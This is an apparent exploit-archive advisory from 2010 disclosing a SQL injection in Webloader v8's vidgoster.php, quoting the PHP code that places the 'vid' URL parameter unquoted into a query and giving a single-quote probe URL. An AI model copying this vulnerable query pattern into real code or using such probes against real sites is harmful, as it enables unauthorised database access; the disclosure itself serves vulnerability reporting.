Webloader v8 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Webloader v8 SQL Injection Vulnerability
# Published : 2010-05-24
# Author : ByEge
# Previous Title : ProWeb Design SQL Injection Vulnerability
# Next Title : JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability

[~] Title: Webloader v8 SQL Injection Vulnerability

[~] Date: 16.05.2010

[~] Script Home: www.webloader.org 

[~] Author: ByEge

[~] Homepage: byege.blogspot.com

[~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]


[~] vidgoster.php Bug code :

[~] <?
[~] include 'baglan.php';
[~] $vid=temiz($_GET['vid']);

[~] $c=solcek("select * from webvideo where id=$vid");
[~] $va=solarray($c);

[~] ?>


[~] Example :

[~] http://site.com/vidgoster.php?vid=1'


[~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]

[~] Th4nks : Fantastik, MitolocyA, ISYAN,